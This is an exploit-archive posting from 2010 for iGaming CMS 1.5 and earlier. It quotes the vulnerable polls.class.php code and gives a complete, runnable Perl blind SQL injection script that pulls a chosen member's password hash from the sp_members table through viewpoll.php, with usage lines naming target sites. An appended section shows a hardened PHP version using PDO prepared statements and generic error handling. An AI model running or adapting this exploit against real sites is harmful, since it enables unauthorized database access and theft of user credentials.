[webapps / 0day] - iGaming CMS <= 1.5 Blind SQL Injection
Posted on 01 October 2010
==============================================
iGaming CMS <= 1.5 Blind SQL Injection Exploit
==============================================

#!/usr/bin/env perl

=pod

iGaming CMS <= 1.5 Blind SQL Injection

Author:   plucky
Email:    io.plucky@gmail.com
Web Site: http://plucky.heliohost.org
Crew:     WarWolfZ

Usage:   perl exploit.pl <website> <user_id>
Example: perl exploit.pl http://website.net/iGamingCMS1.5/ 1

Vulnerability: polls.class.php [line 10-17]

if (!empty($_REQUEST['id']))
{
    $poll   = $db->Execute("SELECT id,title FROM `sp_polls` WHERE `id` = '" . $_REQUEST['id'] . "'");
    $result = $db->Execute("SELECT * FROM sp_polls_options WHERE poll_id = '$_REQUEST[id]' ORDER BY id");

THX TO: shrod and warwolfz crew

=cut

use strict;
use warnings;
use LWP::Simple;

my $password        = '';
my $vulnerable_page = '';
my $target_id       = 1;

sub header_exploit {
    print 'iGaming CMS <= 1.5 Blind SQL Injection' . "\n"
        . '-----------------------------------------' . "\n"
        . 'Author: plucky' . "\n"
        . 'Email: io.plucky@gmail.com' . "\n"
        . '-----------------------------------------' . "\n"
        . '[!]Target id: ' . $target_id . "\n"
        . '[!]Exploit Status: Working...' . "\n";
}

sub usage_exploit {
    print 'Usage:' . "\n"
        . '  perl exploit.pl http://[site]/[path]/ [id]' . "\n"
        . 'Examples:' . "\n"
        . "  perl $0 http://web_site/cms/ 1" . "\n"
        . "  perl $0 http://games_site/iGamingCMS1.5/ 1" . "\n";
    exit;
}

sub run_exploit {
    # Arguments are plain scalars; the original dereferenced them with $$,
    # which dies under 'use strict' because no references were passed in.
    my ( $target_id, $vulnerable_page ) = @_;
    my $HTML_source            = '';
    my $SQL_Injection          = '';
    my $result                 = '';
    my $table                  = 'sp_members';
    my @hexadecimal_characters = ( 48..57, 97..102 );    # ASCII '0'..'9', 'a'..'f'

    # One request per candidate character of the 32-character hash.
    foreach my $character_id ( 1..32 ) {
      character_research:
        foreach my $hexadecimal_character ( @hexadecimal_characters ) {
            $SQL_Injection = "viewpoll.php?id=' or ascii(substring((select pass from $table where id=$target_id),$character_id,1))=$hexadecimal_character\%23";
            $HTML_source   = get( $vulnerable_page . $SQL_Injection );
            if ( $HTML_source !~ /Error/i ) {
                $result .= chr($hexadecimal_character);
                last character_research;
            }
        }
    }
    return $result;
}

$vulnerable_page = $ARGV[0] || usage_exploit;
$target_id       = $ARGV[1] || usage_exploit;

header_exploit;
$password = run_exploit( $target_id, $vulnerable_page );
print '[!]Password: ', $password, "\n";

# Inj3ct0r.com [2010-10-01]
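The polls.class.php fragment quoted in the advisory builds both queries by concatenating $_REQUEST['id'] straight into the SQL text, which is the defect the script above drives. As an added example (editor's code, not iGaming CMS code and not the project's own $db layer), here is the same lookup with the id validated as an integer and both queries issued through PDO prepared statements. The sp_polls and sp_polls_options table names come from the page; PDO, the $pdo handle, the DSN and the fetch_poll function are assumptions.

```php
<?php
// Added example, not iGaming CMS code: hardened form of the poll lookup
// from polls.class.php. PDO and the $pdo handle are assumptions; the
// table and column names are the ones shown in the advisory.

function fetch_poll(PDO $pdo, $raw_id)
{
    // Poll ids are integers. Anything that is not a short digit string
    // (quotes, spaces, '#' comment markers, subqueries) is rejected
    // before it gets anywhere near SQL.
    if (!is_int($raw_id) && !is_string($raw_id)) {
        return null;
    }
    if (!preg_match('/^[0-9]{1,10}$/', (string) $raw_id)) {
        return null;
    }
    $id = (int) $raw_id;

    // Placeholders keep the value out of the statement text, so the
    // database never parses user input as SQL.
    $stmt = $pdo->prepare('SELECT id, title FROM `sp_polls` WHERE `id` = ?');
    $stmt->execute([$id]);
    $poll = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($poll === false) {
        return null;
    }

    $stmt = $pdo->prepare(
        'SELECT * FROM `sp_polls_options` WHERE `poll_id` = ? ORDER BY `id`'
    );
    $stmt->execute([$id]);
    $poll['options'] = $stmt->fetchAll(PDO::FETCH_ASSOC);

    return $poll;
}

// Usage (hypothetical connection; DSN and credentials are placeholders):
//
// $pdo = new PDO('mysql:host=localhost;dbname=igaming', 'dbuser', 'dbpass', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
// ]);
//
// try {
//     $poll = fetch_poll($pdo, $_REQUEST['id'] ?? '');
// } catch (PDOException $e) {
//     error_log($e->getMessage());           // detail stays server-side
//     http_response_code(500);
//     exit('Something went wrong.');         // generic, no query text
// }
// if ($poll === null) {
//     http_response_code(404);
//     exit('No such poll.');
// }
```

The second thing the script relies on is the word "Error" appearing in the response whenever the injected query fails, which turns the page into a true/false oracle for each character. With PDO::ERRMODE_EXCEPTION the failure is raised as an exception; catching it once at the top level, logging the detail and returning a generic message removes that signal. Disabling emulated prepares keeps parameter binding on the MySQL server rather than in the client library, and the integer check in front of the query is defence in depth for a column that is only ever a number.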